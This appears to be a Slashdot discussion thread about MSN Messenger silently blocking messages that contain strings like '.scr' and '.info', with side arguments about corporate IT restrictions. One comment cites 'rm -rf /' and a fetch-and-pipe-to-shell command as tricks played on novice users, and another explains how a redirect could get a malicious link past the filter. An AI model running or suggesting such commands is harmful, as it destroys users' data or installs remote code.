MSN Censors Your IM
Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.
Misleading headline (Score:3, Insightful)
Fix "automatically run code based on text message" (Score:0, Insightful)
Then, fix the rampant security holes in the entire OS that allow someone running as a random user to totally hose the entire OS installation. In other words - get where Unix was, oh, about twenty or thirty years ago.
The fact that M$ has disabled their own apps and OS from doing what they coded it to do is proof that their entire approach to developing software results in insecure products. Time and time again, we see that's true. This is just another example. Why do you "hate" someone who is merely pointing that out?
Priorities and mitigation (Score:4, Insightful)
Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.
This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.
.INFO (Score:4, Insightful)
And if they didn't (Score:2, Insightful)
Not that I'm fond of them either, but it seems they can't win either way these days.
Re:With so many alternatives.. (Score:1, Insightful)
I don't need to use the official client, but sadly I must use some kind of program that connects to the MSN network now and then.
Re:The genius that is Microsoft... (Score:5, Insightful)
Fix what? (Score:5, Insightful)
Someone want to tell me how you fix a user who downloads and runs untrusted executable code?
I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh
MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.
PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.
Re:MSN does some weiiiiiird things... (Score:3, Insightful)
Re:Blocked firefox.exe (Score:3, Insightful)
Part of IT's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then that's too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.
Re:The genius that is Microsoft... (Score:1, Insightful)
Re:Blocked firefox.exe (Score:3, Insightful)
Now, if you come up with a valid business need for said non-standard software, and it's ignored, then we are in agreement.
Re:Blocked firefox.exe (Score:5, Insightful)
What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.
They also do things like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.
My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distribution software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try deleting a video, the software automatically re-downloads it from--you guessed it--your coworkers' computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.
Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.
Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.
I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using such old-school methods as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.
Re:Blocked firefox.exe (Score:3, Insightful)
And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.
Once you grow up and have to support 40000 users, you might understand that things are different in the business world than they are at home.
Vulnerabilities (Score:3, Insightful)
Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.
Sadly, this is the reality of operating an IM/Email/SMS service [ubergoth.net] today. Look carefully at that graphic and realize that it is not an exaggeration.
The Solution! (Score:5, Insightful)
Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.
Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.
Re:-gasp- Slashdot, too! (Score:4, Insightful)
During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critic's prior speeches and found that he'd used it in the past, as well.
Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.
Re:Blocked firefox.exe (Score:2, Insightful)
"Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.
Re:Anybody else notice its .php files that get ... (Score:3, Insightful)
Also the php files are in the document_root directory (or whatever you want to call it).
Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.
And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make an HTTP redirect, so http://example.com/harmless.script [example.com] points to http://example.com/malicious.script?that=pwns&MSN=users [example.com]. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.
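The two complaints in the comment above (very common substrings get blocked, while shortened or redirected links pass) can be reproduced with a small comparison; this is an added example, not part of the original thread and not MSN's filter. Only `.scr` and `.info` come from the story summary; the URL-aware variant, the function names and the sample messages are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Only ".scr" and ".info" come from the story summary; treating them as the
# whole blocklist is an assumption made for this example.
BLOCKED_SUBSTRINGS = (".scr", ".info")
BLOCKED_EXTENSIONS = {".scr"}  # matched against the URL path's file extension
BLOCKED_TLDS = {"info"}        # matched against the host's top-level domain
URL_RE = re.compile(r"(?:https?://|www\.)\S+", re.IGNORECASE)

def substring_filter(message):
    """Drop the message on any raw substring hit, as the story describes."""
    lowered = message.lower()
    return any(s in lowered for s in BLOCKED_SUBSTRINGS)

def url_aware_filter(message):
    """Drop only if a parsed URL has a listed TLD or file extension."""
    for raw in URL_RE.findall(message):
        raw = raw.rstrip(".,;:!?)\"'")
        if not raw.lower().startswith(("http://", "https://")):
            raw = "http://" + raw
        try:
            parts = urlsplit(raw)
        except ValueError:
            continue  # unparseable token: nothing to match on
        host = (parts.hostname or "").lower()
        ext = posixpath.splitext(parts.path.lower())[1]
        if host.rsplit(".", 1)[-1] in BLOCKED_TLDS or ext in BLOCKED_EXTENSIONS:
            return True
    return False

# Constructed sample messages, not captured traffic.
SAMPLES = [
    "the build.script is in the repo",
    "see http://example.com/docs/setup.information.html",
    "look at http://example.com/photo.scr",
    "http://example.info/page",
    "http://example.com/go/abc123",  # short link: destination is invisible
]

def compare(messages=SAMPLES):
    """Return (message, substring_verdict, url_aware_verdict) per message."""
    return [(m, substring_filter(m), url_aware_filter(m)) for m in messages]

if __name__ == "__main__":
    for msg, naive, aware in compare():
        print(f"naive={naive!s:5} url_aware={aware!s:5} {msg}")
```

Parsing the URL removes the first two false positives, but neither filter can judge the last message, because the text of a short link says nothing about where it lands.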
Re:The genius that is Microsoft... (Score:3, Insightful)
Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a Morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choice, but one now holds a General class license. I view them pushing their "favorite" method onto me insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications as acceptable, then I really don't want to be associated with them.
Re:Blocked firefox.exe (Score:2, Insightful)
explains
Hell, for that matter I've yet to work for a company with a helpdesk.
As it's impossible to call a non-existent helpdesk.
So your opinion is, therefore,
Bullshit
as you are unqualified to express one in this situation.
Sorry, no cigar this time. Nice try, though.
Re:Blocked firefox.exe (Score:2, Insightful)
However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? The startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and Google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.
I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.
To me it seems like your company is attempting a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with yahoo directions, when we had a copy of mappoint 2k7 as well as google earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.
As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?
Re:Oh please. (Score:2, Insightful)
Microsoft censored the words to stop those stupid worms going over everyone's MSN account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and it's telling all her contacts the name thing.
So how do they put a stop to this, just censor the bloody url so the message won't send.
Some of you guys on slashdot just have got to realise that MOST PEOPLE WHO USE COMPUTERS ARE _NOT_ AS SMART AS YOU! Some won't update their programs, others won't know how to remove the virus and even more will click on stupid links like that.